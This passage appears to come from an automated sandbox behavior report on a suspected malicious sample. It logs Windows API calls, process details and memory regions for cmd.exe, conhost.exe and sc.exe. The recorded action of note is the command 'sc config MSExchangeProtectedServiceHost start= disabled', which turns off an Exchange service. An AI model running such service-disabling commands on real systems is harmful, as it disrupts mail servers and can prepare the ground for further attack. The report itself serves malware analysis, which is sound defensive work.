(_String1="sc", _String2="GOTO") returned 12 [0132.237] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.237] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.238] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.238] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.238] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.238] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.238] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.238] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.238] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.238] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.238] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.238] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.238] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.238] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.238] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.238] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.238] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.238] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.238] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.238] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.238] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0132.238] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0132.238] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0132.238] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0132.238] SetErrorMode (uMode=0x0) returned 0x0 [0132.238] SetErrorMode (uMode=0x1) returned 0x0 [0132.238] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c205d0, lpFilePart=0x497ee1c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x497ee1c*="Desktop") returned 0x1d [0132.238] SetErrorMode (uMode=0x0) returned 0x1 [0132.238] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.238] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.245] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.245] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.245] GetConsoleTitleW (in: lpConsoleTitle=0x497f09c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.246] InitializeProcThreadAttributeList (in: lpAttributeList=0x497efc8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x497efac | out: lpAttributeList=0x497efc8, lpSize=0x497efac) returned 1 [0132.246] UpdateProcThreadAttribute (in: lpAttributeList=0x497efc8, dwFlags=0x0, Attribute=0x60001, lpValue=0x497efb4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x497efc8, lpPreviousValue=0x0) returned 1 [0132.246] GetStartupInfoW (in: lpStartupInfo=0x497f000 | out: lpStartupInfo=0x497f000*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.246] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.247] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.247] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeProtectedServiceHost start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x497ef50*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeProtectedServiceHost start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x497ef9c | out: lpCommandLine="sc config MSExchangeProtectedServiceHost start= disabled", lpProcessInformation=0x497ef9c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd8c, dwThreadId=0xe58)) returned 1 [0132.253] CloseHandle (hObject=0xa4) returned 1 [0132.253] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.253] GetEnvironmentStringsW () returned 0x4c29f30* [0132.253] FreeEnvironmentStringsA (penv="=") returned 1 [0132.254] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0132.357] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x497ef34 | out: lpExitCode=0x497ef34*=0x424) returned 1 [0132.358] CloseHandle (hObject=0xa8) returned 1 [0132.358] _vsnwprintf (in: _Buffer=0x497f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x497ef3c | out: _Buffer="00000424") returned 8 [0132.358] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0132.358] GetEnvironmentStringsW () returned 0x4c2b388* [0132.358] FreeEnvironmentStringsA (penv="=") returned 1 [0132.358] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.358] GetEnvironmentStringsW () returned 0x4c2b388* [0132.358] FreeEnvironmentStringsA (penv="=") returned 1 [0132.358] DeleteProcThreadAttributeList (in: lpAttributeList=0x497efc8 | out: lpAttributeList=0x497efc8) [0132.358] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.358] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.359] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.359] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.359] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.359] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.359] SetConsoleInputExeNameW () returned 0x1 [0132.359] GetConsoleOutputCP () returned 0x1b5 [0132.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.359] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.359] exit (_Code=1060) Thread: id = 513 os_tid = 0xc20 Process: id = "153" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x75bb3000" os_pid = "0xc68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "152" os_parent_pid = "0x1f4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8174 start_va = 0x7f011000 end_va = 0x7f011fff entry_point = 0x0 region_type = private name = "private_0x000000007f011000" filename = "" Region: id = 8175 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8176 start_va = 0x7090420000 end_va = 0x709043ffff entry_point = 0x0 region_type = private name = "private_0x0000007090420000" filename = "" Region: id = 8177 start_va = 0x7090440000 end_va = 0x7090453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007090440000" filename = "" Region: id = 8178 start_va = 0x7090460000 end_va = 0x709049ffff entry_point = 0x0 region_type = private name = "private_0x0000007090460000" filename = "" Region: id = 8179 start_va = 0x7df5ff680000 end_va = 0x7ff5ff67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff680000" filename = "" Region: id = 8180 start_va = 0x7ff6c3ed0000 end_va = 0x7ff6c3ef2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ed0000" filename = "" Region: id = 8181 start_va = 0x7ff6c3efd000 end_va = 0x7ff6c3efdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3efd000" filename = "" Region: id = 8182 start_va = 0x7ff6c3efe000 end_va = 0x7ff6c3efffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3efe000" filename = "" Region: id = 8183 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8184 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8185 start_va = 0x7090420000 end_va = 0x709042ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007090420000" filename = "" Region: id = 8186 start_va = 0x7090430000 end_va = 0x7090436fff entry_point = 0x0 region_type = private name = "private_0x0000007090430000" filename = "" Region: id = 8187 start_va = 0x70904a0000 end_va = 0x709055dfff entry_point = 0x70904a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8188 start_va = 0x7090560000 end_va = 0x7090560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007090560000" filename = "" Region: id = 8189 start_va = 0x7090570000 end_va = 0x709066ffff entry_point = 0x0 region_type = private name = "private_0x0000007090570000" filename = "" Region: id = 8190 start_va = 0x7090670000 end_va = 0x70906affff entry_point = 0x0 region_type = private name = "private_0x0000007090670000" filename = "" Region: id = 8191 start_va = 0x70906b0000 end_va = 0x70906b6fff entry_point = 0x0 region_type = private name = "private_0x00000070906b0000" filename = "" Region: id = 8192 start_va = 0x70906c0000 end_va = 0x70906c0fff entry_point = 0x0 region_type = private name = "private_0x00000070906c0000" filename = "" Region: id = 8193 start_va = 0x70906d0000 end_va = 0x70906d0fff entry_point = 0x0 region_type = private name = "private_0x00000070906d0000" filename = "" Region: id = 8194 start_va = 0x7090790000 end_va = 0x709079ffff entry_point = 0x0 region_type = private name = "private_0x0000007090790000" filename = "" Region: id = 8195 start_va = 0x70907a0000 end_va = 0x7090927fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000070907a0000" filename = "" Region: id = 8196 start_va = 0x7090930000 end_va = 0x7090ab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007090930000" filename = "" Region: id = 8197 start_va = 0x7090ac0000 end_va = 0x7091ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007090ac0000" filename = "" Region: id = 8198 start_va = 0x7ff6c3dd0000 end_va = 0x7ff6c3ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3dd0000" filename = "" Region: id = 8199 start_va = 0x7ff6c3efb000 end_va = 0x7ff6c3efcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3efb000" filename = "" Region: id = 8200 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8201 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8202 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8203 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8204 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8205 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8206 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8207 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8208 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8209 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8210 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8211 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8212 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8213 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 510 os_tid = 0xc38 Thread: id = 511 os_tid = 0xc78 Thread: id = 512 os_tid = 0xc58 Process: id = "154" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3ea6e000" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "152" os_parent_pid = "0x1f4" cmd_line = "sc config MSExchangeProtectedServiceHost start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8227 start_va = 0x2e0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 8228 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8229 start_va = 0x310000 end_va = 0x323fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 8230 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8231 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 8232 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 8233 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 8234 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 8235 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8236 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8237 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8238 start_va = 0x7e620000 end_va = 0x7e642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e620000" filename = "" Region: id = 8239 start_va = 0x7e645000 end_va = 0x7e645fff entry_point = 0x0 region_type = private name = "private_0x000000007e645000" filename = "" Region: id = 8240 start_va = 0x7e64c000 end_va = 0x7e64efff entry_point = 0x0 region_type = private name = "private_0x000000007e64c000" filename = "" Region: id = 8241 start_va = 0x7e64f000 end_va = 0x7e64ffff entry_point = 0x0 region_type = private name = "private_0x000000007e64f000" filename = "" Region: id = 8242 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8243 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8244 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8245 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8246 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8247 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 8248 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8249 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8250 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 8251 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8252 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 8253 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 8254 start_va = 0x400000 end_va = 0x4bdfff entry_point = 0x400000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8255 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 8256 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 8257 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8258 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8259 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8260 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8261 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8262 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8263 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8264 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8265 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8266 start_va = 0x7e520000 end_va = 0x7e61ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e520000" filename = "" Region: id = 8267 start_va = 0x7e649000 end_va = 0x7e64bfff entry_point = 0x0 region_type = private name = "private_0x000000007e649000" filename = "" Region: id = 8268 start_va = 0x700000 end_va = 0x7defff entry_point = 0x700000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8269 start_va = 0x640000 end_va = 0x651fff entry_point = 0x640000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 514 os_tid = 0xe58 [0132.287] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0132.287] __set_app_type (_Type=0x1) [0132.287] __p__fmode () returned 0x77ac4d6c [0132.287] __p__commode () returned 0x77ac5b1c [0132.287] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0132.288] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0132.288] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.290] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0132.290] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0132.290] _wcsicmp (_String1="config", _String2="query") returned -14 [0132.290] _wcsicmp (_String1="config", _String2="queryex") returned -14 